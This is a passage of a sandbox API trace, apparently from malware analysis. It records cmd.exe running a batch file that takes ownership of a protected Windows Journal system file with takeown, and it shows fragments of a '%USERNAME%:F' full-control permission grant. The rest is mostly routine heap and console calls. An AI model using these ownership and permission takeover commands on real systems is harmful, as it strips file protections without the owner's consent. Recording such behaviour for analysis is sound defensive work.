dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0229.861] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0229.861] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16e944*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16e990 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\"", lpProcessInformation=0x16e990*(hProcess=0x78, hThread=0x74, dwProcessId=0xa28, dwThreadId=0x5d0)) returned 1 [0229.889] CloseHandle (hObject=0x74) returned 1 [0229.889] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0229.889] GetProcessHeap () returned 0x5f0000 [0229.889] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60a118 | out: hHeap=0x5f0000) returned 1 [0229.889] GetEnvironmentStringsW () returned 0x607f30* [0229.889] GetProcessHeap () returned 0x5f0000 [0229.889] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb5c) returned 0x60a118 [0229.889] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0229.889] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0233.100] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x16e884 | out: lpExitCode=0x16e884*=0x0) returned 1 [0233.101] CloseHandle (hObject=0x78) returned 1 [0233.101] _vsnwprintf (in: _Buffer=0x16e9cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x16e890 | out: _Buffer="00000000") returned 8 [0233.101] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0233.101] GetProcessHeap () returned 0x5f0000 [0233.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60a118 | out: hHeap=0x5f0000) returned 1 [0233.101] GetEnvironmentStringsW () returned 0x607f30* [0233.101] GetProcessHeap () returned 0x5f0000 [0233.101] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb5c) returned 0x60a118 [0233.101] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0233.101] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0233.101] GetProcessHeap () returned 0x5f0000 [0233.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60a118 | out: hHeap=0x5f0000) returned 1 [0233.101] GetEnvironmentStringsW () returned 0x607f30* [0233.101] GetProcessHeap () returned 0x5f0000 [0233.101] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb5c) returned 0x60a118 [0233.101] FreeEnvironmentStringsW (penv=0x607f30) returned 1 [0233.101] GetProcessHeap () returned 0x5f0000 [0233.101] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0db8 | out: hHeap=0x5f0000) returned 1 [0233.101] DeleteProcThreadAttributeList (in: lpAttributeList=0x16e8e8 | out: lpAttributeList=0x16e8e8) [0233.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0233.102] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.102] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0233.102] SetConsoleInputExeNameW () returned 0x1 [0233.102] GetConsoleOutputCP () returned 0x1b5 [0233.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0233.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0233.104] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0233.104] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.104] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6069c8 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606898 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606770 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606c48 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6066d8 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6064c0 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606440 | out: hHeap=0x5f0000) returned 1 [0233.104] GetProcessHeap () returned 0x5f0000 [0233.104] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606310 | out: hHeap=0x5f0000) returned 1 [0233.105] GetProcessHeap () returned 0x5f0000 [0233.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6061e8 | out: hHeap=0x5f0000) returned 1 [0233.105] GetProcessHeap () returned 0x5f0000 [0233.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606178 | out: hHeap=0x5f0000) returned 1 [0233.105] GetProcessHeap () returned 0x5f0000 [0233.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6060f0 | out: hHeap=0x5f0000) returned 1 [0233.105] GetProcessHeap () returned 0x5f0000 [0233.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f12a0 | out: hHeap=0x5f0000) returned 1 [0233.105] GetProcessHeap () returned 0x5f0000 [0233.105] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f1240 | out: hHeap=0x5f0000) returned 1 [0233.105] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.105] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0233.105] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0xb3, lpOverlapped=0x0) returned 1 [0233.106] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.106] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0233.107] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.107] GetFileType (hFile=0x78) returned 0x1 [0233.107] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.107] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.107] GetProcessHeap () returned 0x5f0000 [0233.107] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0233.107] GetProcessHeap () returned 0x5f0000 [0233.108] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x76) returned 0x601060 [0233.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", nBufferLength=0x208, lpBuffer=0x16e878, lpFilePart=0x16e870 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", lpFilePart=0x16e870*="jnwmon.dll.mui") returned 0x35 [0233.108] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x5f1240 [0233.108] FindClose (in: hFindFile=0x5f1240 | out: hFindFile=0x5f1240) returned 1 [0233.108] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0233.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x5f1240 [0233.108] FindClose (in: hFindFile=0x5f1240 | out: hFindFile=0x5f1240) returned 1 [0233.108] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0233.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0x5f1240 [0233.108] FindClose (in: hFindFile=0x5f1240 | out: hFindFile=0x5f1240) returned 1 [0233.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwmon.dll.mui", cAlternateFileName="")) returned 0x5f1240 [0233.109] FindClose (in: hFindFile=0x5f1240 | out: hFindFile=0x5f1240) returned 1 [0233.109] GetProcessHeap () returned 0x5f0000 [0233.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x26) returned 0x5ff4d8 [0233.109] GetProcessHeap () returned 0x5f0000 [0233.109] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0233.111] _tell (_FileHandle=3) returned 63 [0233.111] _close (_FileHandle=3) returned 0 [0233.111] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16eebc | out: _Buffer="\r\n") returned 2 [0233.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.111] GetFileType (hFile=0x7) returned 0x2 [0233.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.111] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee7c | out: lpMode=0x16ee7c) returned 1 [0233.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eea8*=0x2) returned 1 [0233.123] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0233.123] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0233.123] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16eeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0233.123] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16eeb8 | out: _Buffer=">") returned 1 [0233.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.123] GetFileType (hFile=0x7) returned 0x2 [0233.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee80 | out: lpMode=0x16ee80) returned 1 [0233.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.125] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16eeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16eeac*=0x26) returned 1 [0233.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.125] GetFileType (hFile=0x7) returned 0x2 [0233.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.126] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f104 | out: lpMode=0x16f104) returned 1 [0233.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5f0dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f130, lpReserved=0x0 | out: lpBuffer=0x5f0dc0*, lpNumberOfCharsWritten=0x16f130*=0x3) returned 1 [0233.127] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f13c | out: _Buffer=" FN=\"jnwmon.dll.mui\" ") returned 21 [0233.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.127] GetFileType (hFile=0x7) returned 0x2 [0233.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.128] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x15) returned 1 [0233.128] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f15c | out: _Buffer="\r\n") returned 2 [0233.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.128] GetFileType (hFile=0x7) returned 0x2 [0233.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.128] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f11c | out: lpMode=0x16f11c) returned 1 [0233.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.129] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f148*=0x2) returned 1 [0233.130] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0233.130] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0233.130] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0233.130] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0233.130] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0233.130] _wcsicmp (_String1="set", _String2="CD") returned 16 [0233.130] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0233.130] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0233.130] _wcsicmp (_String1="set", _String2="REN") returned 1 [0233.130] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0233.130] _wcsicmp (_String1="set", _String2="SET") returned 0 [0233.131] GetConsoleTitleW (in: lpConsoleTitle=0x16eccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.131] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0233.132] SetEnvironmentVariableW (lpName="FN", lpValue="\"jnwmon.dll.mui\"") returned 1 [0233.132] GetProcessHeap () returned 0x5f0000 [0233.132] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x60a118 | out: hHeap=0x5f0000) returned 1 [0233.132] GetEnvironmentStringsW () returned 0x608ac0* [0233.132] GetProcessHeap () returned 0x5f0000 [0233.132] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb84) returned 0x609650 [0233.132] FreeEnvironmentStringsW (penv=0x608ac0) returned 1 [0233.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.132] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0233.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.133] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0233.133] SetConsoleInputExeNameW () returned 0x1 [0233.133] GetConsoleOutputCP () returned 0x1b5 [0233.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0233.134] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0233.135] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0233.135] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.135] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606170 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606130 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6060f0 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0db8 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f1240 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5ff4d8 | out: hHeap=0x5f0000) returned 1 [0233.135] GetProcessHeap () returned 0x5f0000 [0233.135] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x601060 | out: hHeap=0x5f0000) returned 1 [0233.135] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.135] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0233.135] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0xa3, lpOverlapped=0x0) returned 1 [0233.135] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0233.135] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0233.136] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.136] GetFileType (hFile=0x78) returned 0x1 [0233.136] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.136] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0233.136] GetProcessHeap () returned 0x5f0000 [0233.136] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0233.136] GetProcessHeap () returned 0x5f0000 [0233.136] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x70) returned 0x5f1240 [0233.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x16e878, lpFilePart=0x16e870 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x16e870*="Ch81ANBE.bat") returned 0x32 [0233.137] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6060f0 [0233.137] FindClose (in: hFindFile=0x6060f0 | out: hFindFile=0x6060f0) returned 1 [0233.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6060f0 [0233.137] FindClose (in: hFindFile=0x6060f0 | out: hFindFile=0x6060f0) returned 1 [0233.137] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0233.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6060f0 [0233.137] FindClose (in: hFindFile=0x6060f0 | out: hFindFile=0x6060f0) returned 1 [0233.137] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x16e58c | out: lpFindFileData=0x16e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x6060f0 [0233.137] FindClose (in: hFindFile=0x6060f0 | out: hFindFile=0x6060f0) returned 1 [0233.137] GetProcessHeap () returned 0x5f0000 [0233.137] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x56) returned 0x6060f0 [0233.137] GetProcessHeap () returned 0x5f0000 [0233.137] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0233.139] _tell (_FileHandle=3) returned 78 [0233.139] _close (_FileHandle=3) returned 0 [0233.139] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16eebc | out: _Buffer="\r\n") returned 2 [0233.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.139] GetFileType (hFile=0x7) returned 0x2 [0233.142] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.142] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee7c | out: lpMode=0x16ee7c) returned 1 [0233.142] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.142] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eea8*=0x2) returned 1 [0233.144] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0233.144] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0233.144] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16eeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0233.144] _vsnwprintf (in: 